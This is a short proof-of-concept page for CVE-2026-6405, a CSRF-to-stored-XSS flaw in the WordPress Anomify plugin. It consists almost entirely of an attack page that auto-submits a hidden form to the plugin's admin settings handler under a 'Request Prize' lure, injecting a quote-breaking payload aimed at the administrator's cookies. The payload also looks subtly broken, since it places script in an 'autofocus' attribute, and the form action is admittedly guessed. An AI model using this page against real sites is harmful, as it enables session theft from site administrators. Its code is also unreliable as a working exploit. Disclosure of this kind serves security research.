CVE-2026-6405: WordPress Anomify插件CSRF导致存储型XSS漏洞

<!-- PoC for CVE-2026-6405 This HTML page demonstrates the CSRF attack vector to inject Stored XSS. An attacker would host this file and trick a logged-in administrator into visiting it. --> <html> <body> <!-- The form targets the plugin's settings handler (URL may vary based on installation) --> <form action="http://target-wordpress-site/wp-admin/admin.php?page=anomify-settings" method="POST"> <!-- Assuming 'save_settings' or similar is the action based on common WP practices --> <input type="hidden" name="action" value="save" /> <!-- Payload breakdown: sanitize_text_field() strips tags but keeps quotes. The value is rendered like: value="[INPUT]" Input: " autofocus="alert(1) Result: value="" autofocus="alert(1)" --> <input type="hidden" name="api_key" value="&quot; autofocus=&quot;alert(document.cookie)&quot; &quot;" /> <input type="submit" value="Request Prize" /> </form> <script> // Automatically submit the form when the page loads document.forms[0].submit(); </script> </body> </html>